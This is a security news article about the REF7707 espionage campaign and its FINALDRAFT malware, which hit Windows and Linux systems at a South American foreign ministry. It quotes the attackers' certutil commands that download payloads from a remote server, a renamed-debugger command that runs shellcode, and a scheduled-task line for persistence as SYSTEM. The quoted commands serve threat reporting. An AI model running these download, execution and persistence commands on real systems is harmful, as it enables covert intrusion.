REF7707 Hackers Attacking Windows & Linux Machines Using FINALDRAFT Malware

A sophisticated hacking campaign has been unveiled recently by Elastic Security Labs, dubbed “REF7707,” which has been targeting both Windows and Linux systems using novel malware families, including FINALDRAFT, GUIDLOADER, and PATHLOADER.

This campaign has been notable for its advanced tactics and poor operational security, leading to the exposure of additional adversary-owned infrastructure.

The REF7707 campaign was first identified in late November 2024, when Elastic Security Labs observed a cluster of endpoint behavioral alerts at the Foreign Ministry of a South American country.

The investigation uncovered a sprawling campaign with novel malware, sophisticated targeting, and a mature operating cadence.

While the security experts at Elastic Security Labs noted that despite showing high technical competence in some areas, the attackers made tactical oversights that exposed pre-production malware samples and infrastructure.

Execution Flow

The primary execution chain began with the use of Microsoft’s certutil application to download files from a remote server. This involved commands like:-

certutil -urlcache -split -f https://[redacted]/fontdrvhost.exe C:\ProgramData
certutil -urlcache -split -f https://[redacted]/fontdrvhost.rar C:\ProgramData

These files were downloaded using Windows Remote Management’s Remote Shell plugin (WinrsHost.exe), indicating that attackers had valid network credentials for lateral movement.

FINALDRAFT is a key component of the REF7707 intrusion set. It has both Windows and Linux variants and uses an uncommon LOLBin (Living Off The Land Binary) tactic by abusing the Windows-signed debugger CDB.exe, renamed as fontdrvhost.exe.

This binary executes malicious shellcode delivered via a weaponized config.ini file.

C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData

FINALDRAFT injects shellcode into processes like mspaint.exe or conhost.exe if no target parameter is provided.

Persistence was achieved using a Scheduled Task that invoked fontdrvhost.exe every minute as SYSTEM:-

schtasks /create /RL HIGHEST /F /tn "\Microsoft\Windows\AppID\EPolicyManager\" /tr "C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData" /sc MINUTE /mo 1 /RU SYSTEM

FINALDRAFT establishes command and control using Microsoft’s Graph API, blending in with legitimate organizational traffic and evading network-based detection.

The campaign heavily utilizes cloud and third-party services for command and control. Domains like support.vmphere[.]com and update.hobiter[.]com were identified in the malware samples.

These domains are part of the adversary-owned infrastructure. In REF7707 campaign the attackers leverage novel malware and exploit legitimate tools to evade detection.

The use of FINALDRAFT across both Windows and Linux platforms shows the need for robust cross-platform security measures.

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free